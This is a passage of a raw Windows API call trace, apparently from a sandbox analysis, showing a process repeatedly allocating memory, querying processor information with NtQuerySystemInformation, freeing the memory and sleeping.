RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.130] Sleep (dwMilliseconds=0x110) [0215.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.143] Sleep (dwMilliseconds=0x110) [0215.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.161] Sleep (dwMilliseconds=0x110) [0215.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.173] Sleep (dwMilliseconds=0x110) [0215.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.190] Sleep (dwMilliseconds=0x110) [0215.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.205] Sleep (dwMilliseconds=0x110) [0215.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.224] Sleep (dwMilliseconds=0x110) [0215.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.237] Sleep (dwMilliseconds=0x110) [0215.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.255] Sleep (dwMilliseconds=0x110) [0215.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.267] Sleep (dwMilliseconds=0x110) [0215.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.285] Sleep (dwMilliseconds=0x110) [0215.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.298] Sleep (dwMilliseconds=0x110) [0215.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.349] Sleep (dwMilliseconds=0x110) [0215.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.364] Sleep (dwMilliseconds=0x110) [0215.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 